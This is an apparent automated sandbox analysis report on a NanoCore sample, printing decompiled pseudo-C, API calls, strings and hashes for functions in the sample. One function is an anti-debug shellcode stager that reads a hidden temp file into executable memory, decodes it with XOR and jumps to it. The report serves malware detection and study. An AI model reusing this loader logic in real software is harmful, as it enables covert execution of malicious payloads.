						lstrcatA(0x7a0588, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x7a0588,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















            0x0040530c
            0x00405310
            0x00405319
            0x0040531c
            0x0040531f
            0x00405327
            0x00405329
            0x0040532a
            0x00000000
            0x0040532a
            0x00405339
            0x00405339
            0x0040533c
            0x0040533f
            0x00405353
            0x0040535a
            0x0040535f
            0x00405361
            0x00405371
            0x00405363
            0x00405369
            0x00405369
            0x0040537c
            0x00405391
            0x00405393
            0x00405399
            0x0040539c
            0x0040539f
            0x00405461
            0x00405461
            0x00405465
            0x00405467
            0x00405467
            0x00405467
            0x00405467
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004053a5
            0x004053a5
            0x004053ae
            0x004053b4
            0x004053b9
            0x004053bc
            0x004053be
            0x004053c2
            0x004053c4
            0x004053c4
            0x004053c2
            0x004053c7
            0x004053ca
            0x004053dd
            0x004053df
            0x004053e4
            0x004053ea
            0x004053ec
            0x00405407
            0x0040540e
            0x00405414
            0x00405416
            0x0040543b
            0x00405418
            0x00405418
            0x0040541c
            0x00405430
            0x0040541e
            0x00405421
            0x00405429
            0x00405429
            0x0040541c
            0x004053ee
            0x004053f4
            0x004053f6
            0x004053fc
            0x004053fc
            0x004053f6
            0x00000000
            0x004053ec
            0x004053cc
            0x004053cf
            0x004053d1
            0x00000000
            0x00000000
            0x004053d3
            0x004053d5
            0x00000000
            0x00000000
            0x004053d7
            0x004053db
            0x00000000
            0x00000000
            0x00000000
            0x00405440
            0x0040544a
            0x00405450
            0x00405450
            0x0040545b
            0x00000000
            0x00405341
            0x00405341
            0x00405343
            0x0040546b
            0x0040546e
            0x00405471
            0x004054c9
            0x004054c9
            0x004054c9
            0x00405473
            0x00405476
            0x00405481
            0x00405486
            0x00405488
            0x00000000
            0x00000000
            0x0040548b
            0x00405496
            0x0040549d
            0x004054a3
            0x004054a5
            0x00000000
            0x004054c1
            0x004054a7
            0x004054ab
            0x00000000
            0x00000000
            0x004054b0
            0x00000000
            0x004054b7
            0x00405478
            0x00405478
            0x00000000
            0x00405478
            0x00405349
            0x0040534d
            0x00000000
            0x00000000
            0x00000000
            0x0040534d

            APIs
            • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 0040531F
            • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 00405369
            • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 0040537C
            • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 00405382
            • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 00405393
            • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
            • FindClose.KERNEL32(?), ref: 0040545B
            Strings
            • \*.*, xrefs: 00405363
            • "C:\Users\user\Desktop\nanocore.exe" , xrefs: 0040530B
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
            • String ID: "C:\Users\user\Desktop\nanocore.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
            • API String ID: 2035342205-1352018503
            • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
            • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
            • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
            • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6FC71000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85filememorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E6FC71000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t23;
				void* _t35;
				long _t38;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\ks446tcfy17w7jqy3r");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t35 = _t16;
					if(_t35 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t35, 0);
					_t38 = _t16;
					if(_t38 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed
					 *0x6fc73000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t23 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x6fc73000(); // executed
						goto L11;
					}
					do {
						asm("rol cl, 0x2");
						 *((char*)( *0x6fc73000 + _t23)) = (0x00000082 - (( !( *((intOrPtr*)( *0x6fc73000 + _t23)) + 0x00000003 ^ 0x0000006a) ^ 0x000000e1) - _t23 ^ _t23) ^ 0x00000068) - 1 + _t23;
						_t23 = _t23 + 1;
					} while (_t23 < _v8);
					goto L10;
				}
				return _t12;
			}










            0x6fc71009
            0x6fc71018
            0x6fc7101a
            0x6fc7101a
            0x6fc7102c
            0x6fc71034
            0x6fc71047
            0x6fc71066
            0x6fc7106c
            0x6fc71071
            0x6fc710f6
            0x00000000
            0x6fc710f6
            0x6fc7107b
            0x6fc71081
            0x6fc71086
            0x6fc710f5
            0x00000000
            0x6fc710f5
            0x6fc71092
            0x6fc71098
            0x6fc7109f
            0x00000000
            0x00000000
            0x6fc710aa
            0x6fc710b2
            0x00000000
            0x00000000
            0x6fc710b5
            0x6fc710ba
            0x6fc710ee
            0x6fc710ee
            0x00000000
            0x6fc710f4
            0x6fc710c0
            0x6fc710d3
            0x6fc710e5
            0x6fc710e8
            0x6fc710e9
            0x00000000
            0x6fc710c0
            0x6fc710fa

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 6FC71010
            • DebugBreak.KERNEL32 ref: 6FC7101A
            • GetTempPathW.KERNEL32(00000103,?), ref: 6FC7102C
            • lstrcatW.KERNEL32(?,\ks446tcfy17w7jqy3r), ref: 6FC71047
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FC71066
            • GetFileSize.KERNEL32(00000000,00000000), ref: 6FC7107B
            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6FC71092
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6FC710AA
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.651154629.000000006FC71000.00000020.00020000.sdmp, Offset: 6FC70000, based on PE: true
            • Associated: 00000001.00000002.651150286.000000006FC70000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.651162298.000000006FC72000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.651169227.000000006FC74000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
            • String ID: \ks446tcfy17w7jqy3r
            • API String ID: 4020703165-2035310939
            • Opcode ID: e139af75250ee234ea3a10d8683e4c3dcc06fbf0cc80740f4b8d221e47e8f41a
            • Instruction ID: c583b7d1458172d822b004803ed5bb2b2681b9590f714df90304b352f2cdb833
            • Opcode Fuzzy Hash: e139af75250ee234ea3a10d8683e4c3dcc06fbf0cc80740f4b8d221e47e8f41a
            • Instruction Fuzzy Hash: 3221E030600622ABEB309B758C6EBEA7BBCFB07760F104255E724A20C1EE747215CA71
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 64%
            			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x7a3030 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D62(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
				return 0;
			}










            0x00401fdc
            0x00401fe4
            0x00401fe7
            0x00401ff3
            0x00402093
            0x00000000
            0x00401ff9
            0x00402001
            0x0040200b
            0x0040200e
            0x0040201d
            0x0040201e
            0x00402024
            0x00402028
            0x0040208f
            0x00402095
            0x00402095
            0x00000000
            0x00000000
            0x00000000
            0x00402010
            0x00402011
            0x00402017
            0x0040201b
            0x0040202a
            0x00402034
            0x00402038
            0x0040207c
            0x0040203a
            0x0040203d
            0x00402040
            0x00402070
            0x00402042
            0x00402045
            0x0040204e
            0x00402050
            0x00402050
            0x0040204e
            0x00402040
            0x00402084
            0x00402087
            0x00402087
            0x00000000
            0x00000000
            0x00000000
            0x0040201b
            0x0040200e
            0x0040209b
            0x00402932
            0x0040293e

            APIs
            • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
            • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
            • SetErrorMode.KERNEL32 ref: 0040209B
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
            • String ID:
            • API String ID: 1609199483-0
            • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
            • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
            • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
            • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405C94(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x7a15d0;
			}





            0x00405ca2
            0x00405cae
            0x00405cb6
            0x00405cb8
            0x00405cbd
            0x00000000
            0x00405cca
            0x00405cc0
            0x00000000

            APIs
            • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\nanocore.exe" ), ref: 00405CA2
            • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
            • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
            • FindClose.KERNELBASE(00000000), ref: 00405CC0
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ErrorFindMode$CloseFileFirst
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2885216544-3081826266
            • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
            • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
            • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
            • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x7a2f88;
				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x79f580;
					"1033" = 0x7830;
					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
					__eflags =  *0x79f580;
					if(__eflags == 0) {
						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
					}
					lstrcatA("1033", _t78);
				} else {
					E0040591D("1033",  *_t20() & 0x0000ffff);
				}
				E004037F2(_t75, _t88);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
				if(E004055AC(_t88, _t84) != 0) {
					L16:
					if(E004055AC(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059E1(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2768 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037F2(_t75, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t31 = E00404E34(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x7a274c;
								if( *0x7a274c == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f560, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x7a2720);
								 *0x7a2744 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x7a2720);
							}
							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x7a2f80;
						 *0x7a2734 = _t28;
						_v20 = 0x624e5f;
						 *0x7a2724 = E00401000;
						 *0x7a2730 =  *0x7a2f80;
						 *0x7a2744 =  &_v20;
						if(RegisterClassA(0x7a2720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x7a1f20;
					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
					_t61 =  *0x7a1f20; // 0x49
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x7a1f21;
						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059BF(_t84, E004054CC(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405513(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}



























            0x0040352c
            0x0040353d
            0x00403544
            0x00403546
            0x0040355a
            0x0040355f
            0x00403575
            0x0040357a
            0x00403580
            0x00403592
            0x00403592
            0x0040359d
            0x00403548
            0x00403553
            0x00403553
            0x004035a2
            0x004035ac
            0x004035b5
            0x004035c1
            0x00403647
            0x0040364f
            0x00403651
            0x00403657
            0x00403658
            0x00403658
            0x0040366e
            0x00403674
            0x00403682
            0x00403711
            0x00403719
            0x00403723
            0x00403728
            0x0040372e
            0x004037c0
            0x004037c5
            0x004037c7
            0x004037e3
            0x00000000
            0x004037e3
            0x004037c9
            0x004037cf
            0x004037d7
            0x004037d7
            0x00000000
            0x004037cf
            0x0040373c
            0x00403748
            0x0040374e
            0x00403750
            0x00403752
            0x00403755
            0x0040375e
            0x0040375e
            0x00403766
            0x0040376e
            0x00403770
            0x00403772
            0x00403777
            0x0040377d
            0x00403780
            0x00403786
            0x0040378d
            0x0040378d
            0x004037ac
            0x004037b6
            0x00000000
            0x004037bb
            0x0040371b
            0x0040371d
            0x00000000
            0x00403688
            0x00403688
            0x0040368e
            0x00403698
            0x004036a0
            0x004036aa
            0x004036b0
            0x004036be
            0x004037e8
            0x004037e8
            0x00000000
            0x004037e8
            0x004036c4
            0x004036cd
            0x0040370c
            0x00000000
            0x0040370c
            0x004035c7
            0x004035c7
            0x004035cc
            0x00000000
            0x00000000
            0x004035d6
            0x004035e5
            0x004035ea
            0x004035f1
            0x00000000
            0x00000000
            0x004035f5
            0x004035f7
            0x00403604
            0x00403604
            0x0040360c
            0x00403612
            0x0040363a
            0x00403642
            0x00000000
            0x00403624
            0x00403625
            0x0040362e
            0x00403634
            0x00403635
            0x00000000
            0x00403635
            0x00403630
            0x00403632
            0x00000000
            0x00000000
            0x00000000
            0x00403632
            0x00403612

            APIs
              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
            • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\nanocore.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
            • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 00403607
            • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
            • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
            • LoadImageA.USER32 ref: 0040366E
            • RegisterClassA.USER32 ref: 004036B5
              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
            • CreateWindowExA.USER32 ref: 00403706
            • ShowWindow.USER32(00000005,00000000), ref: 0040373C
            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
            • GetClassInfoA.USER32 ref: 0040376E
            • GetClassInfoA.USER32 ref: 0040377D
            • RegisterClassA.USER32 ref: 0040378D
            • DialogBoxParamA.USER32 ref: 004037AC
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
